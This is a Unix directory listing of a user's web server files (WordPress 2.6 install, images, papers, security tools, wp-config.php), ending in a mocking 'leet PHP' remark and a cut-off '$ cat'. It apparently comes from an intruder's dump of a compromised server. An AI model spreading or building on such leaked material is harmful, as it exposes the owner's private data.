effugas effugas 1684930 Sep 16 2003 pk_tuesmorn.tgz -rwxr-xr-x 1 effugas effugas 513611 Dec 13 2004 planelaunch.jpg -rwxr-xr-x 1 effugas effugas 3603472 Nov 15 2005 planetsony.zip -rw-r--r-- 1 effugas effugas 87168 Nov 16 2005 planetsony2_americas.JPG -rw-r--r-- 1 effugas effugas 149712 Nov 16 2005 planetsony2_europe.jpg -rw-r--r-- 1 effugas effugas 105075 Nov 16 2005 planetsony2_japan.jpg -rw-r--r-- 1 effugas effugas 131821 Nov 16 2005 planetsony2_usa.jpg -rwxr-xr-x 1 effugas effugas 80748 Nov 15 2005 planetsony_asia.JPG -rw-r--r-- 1 effugas effugas 2443 Nov 15 2005 planetsony_country_desc.txt -rwxr-xr-x 1 effugas effugas 130460 Nov 15 2005 planetsony_eu.JPG -rwxr-xr-x 1 effugas effugas 130460 Nov 15 2005 planetsony_europe.JPG -rwxr-xr-x 1 effugas effugas 80488 Nov 15 2005 planetsony_usa.JPG lrwxr-xr-x 1 effugas effugas 18 Nov 15 2005 planetsony_usa.jpg -> planetsony_usa.JPG -rw-r--r-- 1 effugas effugas 166094 Nov 2 2004 plast1.jpg -rw-r--r-- 1 effugas effugas 150386 Nov 2 2004 plast2.jpg -rw-r--r-- 1 effugas effugas 51495 Jul 12 2008 pluggable.php -rw-r--r-- 1 effugas effugas 5289 May 27 2008 plugin-editor.php -rw-r--r-- 1 effugas effugas 15991 Jul 7 2008 plugin.php drwxr-xr-x 3 effugas effugas 512 Jul 15 2008 plugins -rw-r--r-- 1 effugas effugas 14487 Jun 30 2008 plugins.php -rwxr-xr-x 1 effugas effugas 16556032 Mar 24 14:04 poison_sample.avi -rw-r--r-- 1 effugas effugas 221 Feb 2 2006 pop.html -rw-r--r-- 1 effugas effugas 583 Nov 14 2002 popup.html -rw-r--r-- 1 effugas effugas 571 Nov 14 2002 popup_ie.html -rw-r--r-- 1 effugas effugas 274 Nov 14 2002 popworks.html drwxr-xr-x 2 effugas effugas 512 Aug 11 2006 portrait -rw-r--r-- 1 effugas effugas 1435 Jun 2 2008 post-new.php -rw-r--r-- 1 effugas effugas 20703 May 29 2008 post-template.php -rw-r--r-- 1 effugas effugas 7041 Jun 29 2008 post.js -rw-r--r-- 1 effugas effugas 22457 Jul 3 2008 post.php -rw-r--r-- 1 effugas effugas 549 Mar 14 2008 postbox.js -rw-r--r-- 1 effugas effugas 3218220 Sep 4 2006 powerpointstream.png -rw-r--r-- 1 effugas effugas 1709639 Aug 15 2006 ppt32.png -rw-r--r-- 1 effugas effugas 197 Jul 13 2008 press-this-ie-rtl.css -rw-r--r-- 1 effugas effugas 113 Jul 12 2008 press-this-ie.css -rw-r--r-- 1 effugas effugas 711 Jul 13 2008 press-this-rtl.css -rw-r--r-- 1 effugas effugas 8277 Jul 11 2008 press-this.css -rw-r--r-- 1 effugas effugas 20572 Jul 14 2008 press-this.php -rw-r--r-- 1 effugas effugas 51212 Feb 27 2007 prince_pickles.jpg drwxr-xr-x 2 effugas effugas 512 Jun 29 2006 priv -rw-r--r-- 1 effugas effugas 10965419 Dec 20 2006 profdemo.zip -rw-r--r-- 1 effugas effugas 73 Jan 31 2008 profile.php -rw-r--r-- 1 effugas effugas 1787 Jan 17 2008 progress.gif -rw-r--r-- 1 effugas effugas 124136 Mar 2 2008 prototype.js -rw-r--r-- 1 effugas effugas 4471 May 8 2004 psrc.zip -rw-r--r-- 1 effugas effugas 4721750 Jun 9 2005 purty.tgz -rw-r--r-- 1 effugas effugas 49807 Jun 24 2008 query.php -rw-r--r-- 1 effugas effugas 436 Aug 10 2006 quickdns.pl -rw-r--r-- 1 effugas effugas 9648 Mar 2 2008 quicktags.js -rw-r--r-- 1 effugas effugas 303 Jan 17 2008 quicktime.gif -rw-r--r-- 1 effugas effugas 53545 Oct 28 2002 rand1.jpg -rw-r--r-- 1 effugas effugas 54881 Oct 28 2002 rand2.jpg -rw-r--r-- 1 effugas effugas 67768 Oct 28 2002 rand3.jpg -rw-r--r-- 1 effugas effugas 2390 Feb 11 2001 rasterbation_bottom.jpg -rw-r--r-- 1 effugas effugas 2372 Feb 11 2001 rasterbation_top.jpg -rw-r--r-- 1 effugas effugas 2646 Mar 16 2005 read.php -rw-r--r-- 1 effugas effugas 7642 Aug 24 2008 readme.html -rw-r--r-- 1 effugas effugas 835 Jun 5 2008 readme.txt -rwxr-xr-x 1 effugas effugas 94 Jul 9 2008 real_index.php -rw-r--r-- 1 effugas effugas 439 Jan 17 2008 realmedia.gif -rw-r--r-- 1 effugas effugas 1869 Oct 17 2005 reconstruct.txt -rw-r--r-- 1 effugas effugas 67285 Apr 6 2002 red_after.jpg -rw-r--r-- 1 effugas effugas 67112 Apr 6 2002 red_before.jpg -rw-r--r-- 1 effugas effugas 200 Jan 4 2008 registration-functions.php -rw-r--r-- 1 effugas effugas 8871 Mar 15 2008 registration.php -rw-r--r-- 1 effugas effugas 62 Jul 9 2008 required.gif drwxrwxrwx 3 effugas effugas 512 Oct 17 2005 research -rw-r--r-- 1 effugas effugas 6289 Jul 10 2008 revision.php -rw-r--r-- 1 effugas effugas 2988 Jul 10 2008 revisions-js.php -rw-r--r-- 1 effugas effugas 33998 Jun 29 2008 rewrite.php -rw-r--r-- 1 effugas effugas 513 Jul 1 2001 right.gif -rw-r--r-- 1 effugas effugas 2293905 Feb 21 2005 rlvidq1.wmv -rw-r--r-- 1 effugas effugas 11417 Feb 2 2006 rlvidq1_wm_m6.smi -rw-r--r-- 1 effugas effugas 964 Aug 27 2004 rmemcpy.c -r-xrwxr-x 1 effugas effugas 483110 Jul 24 2005 router_sniff.png -rw-r--r-- 1 effugas effugas 2004 Jan 17 2008 rpc.php -rw-r--r-- 1 effugas effugas 183 Jan 4 2008 rss-functions.php -rw-r--r-- 1 effugas effugas 5042 Feb 27 2008 rss.php -rw-r--r-- 1 effugas effugas 3341 Apr 23 2007 rss.png -rw-r--r-- 1 effugas effugas 2005 Jul 21 2007 rtl.css -rw-r--r-- 1 effugas effugas 493 Feb 11 2001 run_tooltip.gif -rwxrwxrwx 1 effugas effugas 1849 Mar 29 22:43 ryan.html -rw-r--r-- 1 effugas effugas 80 Nov 14 2002 sacred.html drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 safari -rwxr-xr-x 1 effugas effugas 543 Nov 19 2006 safeup.html -rw-r--r-- 1 effugas effugas 149222 Feb 11 2001 saints.jpg -rw-r--r-- 1 effugas effugas 3518 Feb 11 2001 saints_small.jpg -rw-r--r-- 1 effugas effugas 1465600 Feb 19 2006 sample.jpg -rw-r--r-- 1 effugas effugas 1464695 Feb 19 2006 sample2.jpg -rw-r--r-- 1 effugas effugas 279239 Feb 19 2006 sample2_re.jpg -rw-r--r-- 1 effugas effugas 209713 Feb 19 2006 sample_re.jpg -rw-r--r-- 1 effugas effugas 2687942 Sep 25 2006 samples.zip -rw-r--r-- 1 effugas effugas 15531 Jun 26 2008 schema.php -rw-r--r-- 1 effugas effugas 8412 Aug 7 2005 screenshot.png -rw-r--r-- 1 effugas effugas 14705 Jul 13 2008 script-loader.php drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 scriptaculous -rw-r--r-- 1 effugas effugas 2654 Mar 2 2008 scriptaculous.js drwxr-sr-x 2 effugas effugas 512 Oct 17 2005 scripts -rw-r--r-- 1 effugas effugas 56767 Sep 5 2007 scroll.html -rwxr-xr-x 1 effugas effugas 3503962 Mar 30 07:53 scs.zip -rwxrwxrwx 1 effugas effugas 5345321 Mar 30 11:21 scs2.zip -rw-r--r-- 1 effugas effugas 1354 Sep 18 2007 search.php -rw-r--r-- 1 effugas effugas 290 May 4 2008 searchform.php -rw-r--r-- 1 effugas effugas 40 Nov 14 2002 sec2.html -rw-r--r-- 1 effugas effugas 887808 Nov 6 2003 sec_dmk.ppt -rw-r--r-- 1 effugas effugas 476 Nov 14 2002 secalert.html -rwxr-xr-x 1 effugas effugas 1358 Aug 13 2004 sel4.pl -rwxr-xr-x 1 effugas effugas 324608 Sep 16 2005 seminar_slides.ppt -rw-r--r-- 1 effugas effugas 446 Nov 14 2002 sep11.php drwxr-xr-x 2 effugas effugas 2560 Aug 9 2007 seqpaper -rw-r--r-- 1 effugas effugas 54965 Jul 9 2006 seqshithot.png -rw-r--r-- 1 effugas effugas 140673 Aug 9 2007 seqxml.tar.gz -rw-r--r-- 1 effugas effugas 99 Feb 9 2006 serv.html -rw-r--r-- 1 effugas effugas 6239 Jul 10 2008 setup-config.php -rw-r--r-- 1 effugas effugas 469 Jan 31 2008 sflogo.png -rw-r--r-- 1 effugas effugas 5262 Apr 18 2008 shell.php -rw-r--r-- 1 effugas effugas 1035150 Aug 13 2006 shell32_256_full.png -rw-r--r-- 1 effugas effugas 49986 Jul 27 2006 shellcode2.png -rw-r--r-- 1 effugas effugas 387 Jan 17 2008 shockwave.gif -rw-r--r-- 1 effugas effugas 7543 Jun 26 2008 shortcodes.php drwxr-xr-x 2 effugas effugas 512 Feb 21 2007 shwmp -rw-r--r-- 1 effugas effugas 1825 Mar 31 2007 sidebar.php -rw-r--r-- 1 effugas effugas 1427259 Aug 20 2006 sidescroll.png drwxr-xr-x 2 effugas effugas 512 Dec 20 2006 sigvid -rwxr-xr-x 1 effugas effugas 629170 Sep 2 2005 sigvids drwxr-xr-x 2 effugas effugas 512 Sep 23 2008 sim -rw-r--r-- 1 effugas effugas 32943 Feb 2 2006 simple.htm -rw-r--r-- 1 effugas effugas 33067 Feb 2 2006 simple_full.htm -rw-r--r-- 1 effugas effugas 167692 May 9 2007 simviz.jpg -rw-r--r-- 1 effugas effugas 1143489 May 9 2007 simviz.png -rw-r--r-- 1 effugas effugas 197080 May 27 2007 simviz2.jpg -rw-r--r-- 1 effugas effugas 2590 Mar 31 2008 single.php drwxr-sr-x 3 effugas effugas 512 Oct 17 2005 sites drwxr-xr-x 5 effugas effugas 512 Aug 19 2008 skins -rwxr-xr-x 1 effugas effugas 72323 Dec 10 2004 slashdot.js -rw-r--r-- 1 effugas effugas 10296 Mar 2 2008 slider.js drwxrwxrwx 2 effugas effugas 512 Aug 9 2007 slides -rw-r--r-- 1 effugas effugas 512924 Apr 5 2005 slirp-1.1.3b_crypt.tgz -rw-r--r-- 1 effugas effugas 1741 Mar 3 2008 slug.js -rw-r--r-- 1 effugas effugas 221755 Feb 25 2002 small2.pdf -rw-r--r-- 1 effugas effugas 359740 Feb 26 2002 small3.pdf -rw-r--r-- 1 effugas effugas 350539 Feb 25 2002 smalltest.pdf -rw-r--r-- 1 effugas effugas 565876 Feb 25 2002 smalltest3.pdf drwxr-xr-x 2 effugas effugas 1024 Jul 15 2008 smilies -rw-r--r-- 1 effugas effugas 3048 Aug 18 2006 soaptalk.html -rw-r--r-- 1 effugas effugas 3594 Aug 21 2006 soaptalk.txt -rw-r--r-- 1 effugas effugas 3212 Aug 21 2006 soaptalk_orig.txt drwxr-xr-x 2 effugas effugas 512 Nov 15 2005 sony -rw-r--r-- 1 effugas effugas 3008 Nov 17 2005 sony_country.txt -rw-r--r-- 1 effugas effugas 1920 Mar 2 2008 sound.js -rw-r--r-- 1 effugas effugas 1364 Jun 27 2008 source_editor.htm -rw-r--r-- 1 effugas effugas 1401 Jan 17 2008 source_editor.js -rw-r--r-- 1 effugas effugas 118 Feb 6 2006 span.html -rw-r--r-- 1 effugas effugas 87 Feb 6 2006 span2.html -rw-r--r-- 1 effugas effugas 72 Feb 6 2006 span3.html -rw-r--r-- 1 effugas effugas 42098 Sep 2 2003 speedy_mplayer.tgz drwxr-xr-x 6 effugas effugas 512 Aug 19 2008 spellchecker -rwxr-xr-x 1 effugas effugas 69362 Nov 5 2002 sphere1.jpg -rwxr-xr-x 1 effugas effugas 1229429 Jul 18 2006 spm.cab -rw-r--r-- 1 effugas effugas 26 Jul 18 2006 spm.html -rw-r--r-- 1 effugas effugas 2725 Feb 28 2008 spreadsheet.png -rw-r--r-- 1 effugas effugas 46 Feb 1 2006 src.html -rw-r--r-- 1 effugas effugas 569951 May 20 2005 ssh_trace.txt -rw-r--r-- 1 effugas effugas 2508 Aug 5 2004 sshd_config -rw-rw-rw- 1 effugas effugas 142885 Jul 27 2003 ssldump-ids.tgz -rw-r--r-- 1 effugas effugas 10470 Nov 14 2002 status.html -rw-r--r-- 1 effugas effugas 4068 Jun 22 2003 stn.jpg -rw-r--r-- 1 effugas effugas 38813 Apr 29 2003 stn_big.jpg -rw-r--r-- 1 effugas effugas 4850 Mar 1 2008 stp.php -rw-r--r-- 1 effugas effugas 3858 Jun 17 2008 streams.php -rw-r--r-- 1 effugas effugas 7917 Apr 18 2008 string.php -rw-r--r-- 1 effugas effugas 3365 Dec 6 2004 stripwire-1.1.tar.gz -rwxr-xr-x 1 effugas effugas 8014 Oct 21 2004 stripwire.pl -rw-r--r-- 1 effugas effugas 5623 Jul 8 2008 style.css drwxr-xr-x 2 effugas effugas 512 Jul 24 2007 sucket -rw-r--r-- 1 effugas effugas 7404 Jun 29 2008 suggest.js -rwxr-xr-x 1 effugas effugas 1169 Jun 15 2007 support.js -rw-r--r-- 1 effugas effugas 1542 Feb 21 2008 swf.png drwxr-xr-x 3 effugas effugas 512 Jul 15 2008 swfupload -rw-r--r-- 1 effugas effugas 1583 Jun 6 2008 swfupload.cookies.js -rw-r--r-- 1 effugas effugas 3690 Jun 6 2008 swfupload.documentready.js -rw-r--r-- 1 effugas effugas 2639 Jun 6 2008 swfupload.graceful_degradation.js -rw-r--r-- 1 effugas effugas 38457 Jun 6 2008 swfupload.js -rw-r--r-- 1 effugas effugas 1785 Jun 6 2008 swfupload.queue.js -rw-r--r-- 1 effugas effugas 9109 Jun 6 2008 swfupload_f9.swf -rw-r--r-- 1 effugas effugas 55423 Jun 29 2006 swollen_nose.jpg -rwxr-xr-x 1 effugas effugas 2354842 Aug 5 2005 syngress_Exposed-web.mov -rw-r--r-- 1 effugas effugas 40737 Feb 13 2005 t1.html -rw-r--r-- 1 effugas effugas 40737 Feb 13 2005 t2.html -rw-r--r-- 1 effugas effugas 1006 May 12 2008 tab.png -rw-r--r-- 1 effugas effugas 1326 Jan 17 2008 tabs.gif -rw-r--r-- 1 effugas effugas 547 Jan 25 2008 tags.js -rw-r--r-- 1 effugas effugas 98 Mar 15 2008 tail.gif -rw-r--r-- 1 effugas effugas 1280 Feb 21 2008 tar.png -rw-r--r-- 1 effugas effugas 3379 May 8 2008 taxonomy.php -rw-r--r-- 1 effugas effugas 506 Jan 9 2008 tb-close.png -rw-r--r-- 1 effugas effugas 2206516 Feb 25 2002 technotrash.pdf -rw-r--r-- 1 effugas effugas 2206516 Feb 25 2002 technotrash_v2.pdf -rw-r--r-- 1 effugas effugas 2479969 Feb 26 2002 technotrash_v3.pdf -rw-r--r-- 1 effugas effugas 2184 Apr 20 2008 template-loader.php -rw-r--r-- 1 effugas effugas 12499 Jun 27 2008 template.htm -rw-r--r-- 1 effugas effugas 45005 Jul 12 2008 template.php -rw-r--r-- 1 effugas effugas 99 Mar 14 15:04 test.gif -rw-r--r-- 1 effugas effugas 365 Nov 14 2002 test.html -rwxr-xr-x 1 effugas effugas 274 Jan 29 2006 test.py -rw-r--r-- 1 effugas effugas 136 Jan 29 2006 test.vbs -rw-r--r-- 1 effugas effugas 634 Feb 5 2005 test1.html -rw-r--r-- 1 effugas effugas 634 Feb 5 2005 test2.html -rw-r--r-- 1 effugas effugas 156179 Mar 26 2007 testtiff.html -rw-r--r-- 1 effugas effugas 155827 Jun 15 2007 testtiff_pattern.html -rw-r--r-- 1 effugas effugas 999 Feb 28 2008 text.png -rw-r--r-- 1 effugas effugas 20311 Apr 14 2008 textpattern.php -rw-r--r-- 1 effugas effugas 18161 Dec 20 2005 thc-ipv6-0.2.tar.gz -rw-r--r-- 1 effugas effugas 23348 Feb 12 2006 thc-ipv6-0.4.tar.gz -rw-r--r-- 1 effugas effugas 23833 Feb 15 2006 thc-ipv6-0.5.tar.gz -rw-r--r-- 1 effugas effugas 199 Jul 13 2008 theme-editor-rtl.css -rw-r--r-- 1 effugas effugas 813 Mar 14 2008 theme-editor.css -rw-r--r-- 1 effugas effugas 5863 Jun 27 2008 theme-editor.php -rw-r--r-- 1 effugas effugas 1464 Jun 25 2008 theme-preview.js -rw-r--r-- 1 effugas effugas 1506 Jun 4 2008 theme.php drwxr-sr-x 10 effugas effugas 512 Oct 17 2005 themes -rw-r--r-- 1 effugas effugas 7057 Jun 3 2008 themes.php drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 thickbox -rw-r--r-- 1 effugas effugas 3597 Jun 14 2008 thickbox.css -rw-r--r-- 1 effugas effugas 12079 Mar 15 2008 thickbox.js -rw-r--r-- 1 effugas effugas 176791 Feb 11 2001 thieves.jpg -rw-r--r-- 1 effugas effugas 4680 Feb 11 2001 thieves_small.jpg -rw-r--r-- 1 effugas effugas 46 Aug 20 2006 tieview.html -rw-r--r-- 1 effugas effugas 2630109 Aug 20 2006 tieview.png -rw-r--r-- 1 effugas effugas 155446 Jun 27 2008 tiny_mce.js -rw-r--r-- 1 effugas effugas 11690 Jul 11 2008 tiny_mce_config.php -rw-r--r-- 1 effugas effugas 1007 Jun 4 2008 tiny_mce_ext.js -rw-r--r-- 1 effugas effugas 6870 Jun 4 2008 tiny_mce_popup.js drwxr-xr-x 6 effugas effugas 512 Jul 15 2008 tinymce -rwxr-xr-x 1 effugas effugas 1333 Nov 15 2002 titlife.txt drwxr-xr-x 2 effugas effugas 512 May 2 2005 tmp -rw-r--r-- 1 effugas effugas 2107 May 14 2005 to_ani.txt -rw-r--r-- 1 effugas effugas 403484 Oct 18 2004 tod.zip -rw-r--r-- 1 effugas effugas 10557 Aug 11 2001 todo.xml -rw-r--r-- 1 effugas effugas 72 Mar 19 2008 toggle-arrow-rtl.gif -rw-r--r-- 1 effugas effugas 71 Jan 8 2008 toggle-arrow.gif -rw-r--r-- 1 effugas effugas 2894 Nov 14 2002 tommie.html -rw-r--r-- 1 effugas effugas 3226 Nov 14 2002 tommie2.html -rw-r--r-- 1 effugas effugas 260 Jan 31 2008 toolbars.gif -rw-r--r-- 1 effugas effugas 78 Nov 14 2002 top.html -rw-r--r-- 1 effugas effugas 1491 Nov 14 2002 trace.txt -rw-r--r-- 1 effugas effugas 182532 Nov 14 2002 tracerpulse.txt drwxr-xr-x 2 effugas effugas 512 Feb 11 2007 traffic drwxr-xr-x 2 effugas effugas 512 Feb 13 2007 traffic2 -rw-r--r-- 1 effugas effugas 43 Jan 31 2008 trans.gif -rw-r--r-- 1 effugas effugas 90214 Nov 2 2005 trespass.pdf -rw-r--r-- 1 effugas effugas 93136 Nov 3 2005 trespass2.pdf -rw-r--r-- 1 effugas effugas 4969 Apr 5 2006 tw-sack.js -rwxr-xr-x 1 effugas effugas 1574638 Jul 31 2006 two_dlls.png -rw-r--r-- 1 effugas effugas 3692 Jun 27 2008 ui.core.js -rw-r--r-- 1 effugas effugas 15497 Apr 14 2008 ui.css -rw-r--r-- 1 effugas effugas 10338 Jun 27 2008 ui.sortable.js -rw-r--r-- 1 effugas effugas 6194 Jun 27 2008 ui.tabs.js -rw-r--r-- 1 effugas effugas 49618 Sep 1 2006 ultimate_tattoo.jpg -rwxr-xr-x 1 effugas effugas 197632 Jul 23 2003 ultravnc.exe -rw-r--r-- 1 effugas effugas 9755 Nov 6 2005 under_the_bay.jpg -rw-r--r-- 1 effugas effugas 4686 May 8 2004 uni.txt -rw-r--r-- 1 effugas effugas 20197 Mar 2 2008 unittest.js -rw-r--r-- 1 effugas effugas 3918665 Jun 28 2004 unnamed.tgz -rw-r--r-- 1 effugas effugas 1426 May 20 2008 update-links.php -rw-r--r-- 1 effugas effugas 7255 Jul 11 2008 update.php -rw-r--r-- 1 effugas effugas 188 Mar 21 2008 upgrade-functions.php -rw-r--r-- 1 effugas effugas 48179 Jun 26 2008 upgrade.php -rw-r--r-- 1 effugas effugas 131 Mar 22 2008 upload-rtl.css -rw-r--r-- 1 effugas effugas 13224 Mar 15 2008 upload.js -rw-r--r-- 1 effugas effugas 8138 May 4 2008 upload.php -rw-r--r-- 1 effugas effugas 100738 Oct 28 2002 urandom1.jpg drwxrwxrwx 2 effugas effugas 4608 Sep 1 2007 usage -rw-r--r-- 1 effugas effugas 11602 Jun 23 2008 user-edit.php -rw-r--r-- 1 effugas effugas 13174 Jun 25 2008 user.php -rw-r--r-- 1 effugas effugas 49 Mar 2 2008 users.js -rw-r--r-- 1 effugas effugas 14307 May 27 2008 users.php drwxr-xr-x 2 effugas effugas 512 Aug 19 2008 utils -rw-r--r-- 1 effugas effugas 6690 Feb 27 2008 utw.php -rwxr-xr-x 1 effugas effugas 52818 Feb 21 2006 v2DanKFeb06.PDF -rwxr-xr-x 1 effugas effugas 105472 Feb 22 2005 va.exe -rw-r--r-- 1 effugas effugas 4764 Jun 4 2008 validate.js -rw-r--r-- 1 effugas effugas 2417 Jan 4 2008 vars.php -rw-r--r-- 1 effugas effugas 36904 Jul 22 2001 vasegallery.jpg -rw-r--r-- 1 effugas effugas 604 Dec 9 2004 vec1.html -rw-r--r-- 1 effugas effugas 788 Dec 10 2004 vec1_big.html -rw-r--r-- 1 effugas effugas 122553 Dec 28 2004 vec1_c.html -rw-r--r-- 1 effugas effugas 604 Dec 9 2004 vec2.html -rw-r--r-- 1 effugas effugas 788 Dec 10 2004 vec2_big.html -rw-r--r-- 1 effugas effugas 122553 Dec 28 2004 vec2_c.html -rw-r--r-- 1 effugas effugas 13 Jun 1 01:52 verify_1317e0e43d7d72.html -rw-r--r-- 1 effugas effugas 372 Jul 14 2008 version.php -rw-r--r-- 1 effugas effugas 92 Jan 17 2008 vertical.gif drwxr-xr-x 2 effugas effugas 512 Sep 2 2004 vid -rw-r--r-- 1 effugas effugas 99 Jul 3 2008 video.gif -rw-r--r-- 1 effugas effugas 2372 Feb 28 2008 video.png drwxr-xr-x 5 effugas effugas 512 Sep 23 2008 vidsim -rw-r--r-- 1 effugas effugas 630 Feb 2 2006 violins.asx -rw-r--r-- 1 effugas effugas 672 Feb 2 2006 violins.smi -rw-r--r-- 1 effugas effugas 5228 Feb 2 2006 vml.html -rw-r--r-- 1 effugas effugas 1165 Feb 2 2006 vml2.html -rw-r--r-- 1 effugas effugas 1178 Feb 2 2006 vml3.html -rw-r--r-- 1 effugas effugas 1641642 Feb 8 2005 voicemail.mp3 drwxr-xr-x 2 effugas effugas 512 Nov 15 2002 vol -rw-r--r-- 1 effugas effugas 106130 Dec 14 2004 w32dns.zip -rw-r--r-- 1 effugas effugas 763750 Nov 9 2006 walter.zip -rw-r--r-- 1 effugas effugas 141 Nov 18 2006 warning.html -rw-r--r-- 1 effugas effugas 3594 Aug 18 2006 wash_your_mouth_out_with_soap.html -rw-r--r-- 1 effugas effugas 424 Nov 14 2002 webcache.html -rw-r--r-- 1 effugas effugas 210717 Mar 26 2003 weilsigs.pdf -rw-r--r-- 1 effugas effugas 452841 Feb 25 2003 weilsigs.ps drwxr-xr-x 2 effugas effugas 512 Jun 7 2004 whoa -rw-r--r-- 1 effugas effugas 33721 Jun 5 2007 why_you_do_this.jpg -rw-r--r-- 1 effugas effugas 1027 May 20 2008 widgets-rtl.css -rw-r--r-- 1 effugas effugas 3211 May 21 2008 widgets.css -rw-r--r-- 1 effugas effugas 4704 May 3 2008 widgets.js -rw-r--r-- 1 effugas effugas 9986 Jul 4 2008 widgets.php -rw-r--r-- 1 effugas effugas 81546 Nov 14 2002 win_ie6.png -rw-r--r-- 1 effugas effugas 72482 Nov 14 2002 win_moz11.png -rw-r--r-- 1 effugas effugas 7068 Apr 14 2008 window.css -rw-r--r-- 1 effugas effugas 415 Jan 17 2008 windowsmedia.gif -rw-r--r-- 1 effugas effugas 48738 Sep 19 2002 wire_1.0.pdf -rw-r--r-- 1 effugas effugas 64587 Dec 12 2002 wire_1.1.pdf -rw-r--r-- 1 effugas effugas 53316 Feb 11 2001 wires.jpg -rw-r--r-- 1 effugas effugas 46 Jan 17 2008 wline.gif drwxr-xr-x 2 effugas effugas 512 Jul 15 2008 wlw -rw-r--r-- 1 effugas effugas 1013 Oct 8 2007 wlwmanifest.xml -rw-r--r-- 1 effugas effugas 967 Jun 3 2008 word-count.js -rw-r--r-- 1 effugas effugas 162 Jan 29 2006 word.html drwxr-xr-x 5 effugas effugas 1024 Aug 19 2008 wordpress -rw-r--r-- 1 effugas effugas 1302795 Aug 19 2008 wordpress-2.6.tar.gz -rw-r--r-- 1 effugas effugas 2334 Feb 18 2008 wordpress-logo.png -rw-r--r-- 1 effugas effugas 1475 Jul 11 2008 wordpress.css -rw-r--r-- 1 effugas effugas 24049 May 20 2008 wordpress.php -rw-r--r-- 1 effugas effugas 91190 Sep 3 2006 workout.png drwxr-xrwx 7 effugas effugas 1024 Sep 26 2005 wp drwxr-xr-x 7 effugas effugas 2048 Aug 24 2008 wp-admin -rw-r--r-- 1 effugas effugas 25511 Jul 10 2008 wp-admin.css -rw-r--r-- 1 effugas effugas 2921 Mar 20 2008 wp-ajax-response.js -rw-r--r-- 1 effugas effugas 34072 Aug 24 2008 wp-app.php -rw-r--r-- 1 effugas effugas 555 Aug 24 2008 wp-atom.php -rw-r--r-- 1 effugas effugas 274 Aug 24 2008 wp-blog-header.php -rw-r--r-- 1 effugas effugas 16961 Jul 7 2008 wp-cat2tag.php -rw-r--r-- 1 effugas effugas 3091 Aug 24 2008 wp-comments-post.php -rw-r--r-- 1 effugas effugas 1442 Oct 8 2007 wp-comments.png -rw-r--r-- 1 effugas effugas 625 Aug 24 2008 wp-commentsrss2.php -rw-r--r-- 1 effugas effugas 1569 Aug 24 2008 wp-config-sample.php -rw-r--r-- 1 effugas effugas 1374 Aug 24 2008 wp-config.php drwxr-xr-x 6 effugas effugas 512 Aug 24 2008 wp-content -rw-r--r-- 1 effugas effugas 1257 Aug 24 2008 wp-cron.php -rw-r--r-- 1 effugas effugas 24346 Jul 10 2008 wp-db.php -rw-r--r-- 1 effugas effugas 10111 Jul 6 2008 wp-diff.php -rw-r--r-- 1 effugas effugas 661 Aug 24 2008 wp-feed.php -rw-r--r-- 1 effugas effugas 2396 May 19 2008 wp-gears.js -rw-r--r-- 1 effugas effugas 779 Oct 8 2007 wp-icon.png drwxr-xr-x 5 effugas effugas 2048 Aug 24 2008 wp-includes -rw-r--r-- 1 effugas effugas 22612 Jul 10 2008 wp-langs.php -rw-r--r-- 1 effugas effugas 1986 Aug 24 2008 wp-links-opml.php -rw-r--r-- 1 effugas effugas 11635 Apr 14 2008 wp-lists.js -rw-r--r-- 1 effugas effugas 1950 Aug 24 2008 wp-load.php -rw-r--r-- 1 effugas effugas 19219 Aug 24 2008 wp-login.php -rw-r--r-- 1 effugas effugas 6404 Aug 24 2008 wp-mail.php -rw-r--r-- 1 effugas effugas 12566 Jun 27 2008 wp-mce-help.php -rw-r--r-- 1 effugas effugas 487 Aug 24 2008 wp-pass.php -rw-r--r-- 1 effugas effugas 473 Aug 24 2008 wp-rdf.php -rw-r--r-- 1 effugas effugas 316 Aug 24 2008 wp-register.php -rw-r--r-- 1 effugas effugas 484 Aug 24 2008 wp-rss.php -rw-r--r-- 1 effugas effugas 555 Aug 24 2008 wp-rss2.php -rw-r--r-- 1 effugas effugas 2617 Mar 2 2008 wp-scriptaculous.js -rw-r--r-- 1 effugas effugas 17172 Aug 24 2008 wp-settings.php drwxr-xr-x 3 effugas effugas 512 Jul 24 2008 wp-super-cache -rw-r--r-- 1 effugas effugas 29906 Jul 8 2008 wp-super-cache.0.6.4.zip -rw-r--r-- 1 effugas effugas 31102 Jul 24 2008 wp-super-cache.0.6.5.zip -rw-r--r-- 1 effugas effugas 3434 Aug 24 2008 wp-trackback.php -rw-r--r-- 1 effugas effugas 8280 Oct 8 2007 wp-watermark.png drwxr-xr-x 3 effugas effugas 512 Aug 19 2008 wp_theme drwxr-xr-x 5 effugas effugas 512 Aug 19 2008 wpeditimage -rw-r--r-- 1 effugas effugas 65 Apr 1 2007 wpf.html drwxr-xr-x 9 effugas effugas 512 Mar 16 2005 writings drwxr-xr-x 6 effugas effugas 512 Oct 17 2005 wtf -rw-r--r-- 1 effugas effugas 986 Nov 14 2002 wtf.html -rwxr-xr-x 1 effugas effugas 14529 Sep 26 2005 wtf.log drwxr-xr-x 2 effugas effugas 512 Apr 2 2006 wtf2 drwxr-xr-x 2 effugas effugas 512 Oct 12 2005 x drwxr-xr-x 5 effugas effugas 1024 Jan 21 2002 x10 -rw-r--r-- 1 effugas effugas 2231 Apr 18 2008 xdiff.php -rw-r--r-- 1 effugas effugas 1293 Jun 1 2007 xfn.js -rw-r--r-- 1 effugas effugas 181 Jan 2 2008 xit.gif -rw-r--r-- 1 effugas effugas 75403 Aug 24 2008 xmlrpc.php drwxr-xr-x 2 effugas effugas 512 Dec 28 2005 xovi -rw-r--r-- 1 effugas effugas 586 Feb 20 08:16 xqid.txt -rw-r--r-- 1 effugas effugas 187 Feb 1 2006 yack.html -rwxr-xr-x 1 effugas effugas 2566180 Nov 24 2005 yed.jar -rwxrwxrwx 1 effugas effugas 9041858 Aug 6 2008 yellow-7days-with-percentage.avi -rw-r--r-- 1 effugas effugas 612 Jul 9 2008 yes.png -rw-r--r-- 1 effugas effugas 4463377 Aug 8 2006 zelda32.png -rw-r--r-- 1 effugas effugas 29121 Dec 8 2003 zen.html -rw-r--r-- 1 effugas effugas 14631 Dec 8 2003 zen.txt -rw-r--r-- 1 effugas effugas 1270 Feb 21 2008 zip.png -rw-r--r-- 1 effugas effugas 86 Feb 6 2006 zippo2.html -rw-r--r-- 1 effugas effugas 923947 Nov 4 2008 zombie2.swf -rw-r--r-- 1 effugas effugas 673 Nov 4 2008 zombie2.swf.html // Here comes some leet PHP that looks so old school it probably predates PHP $ cat 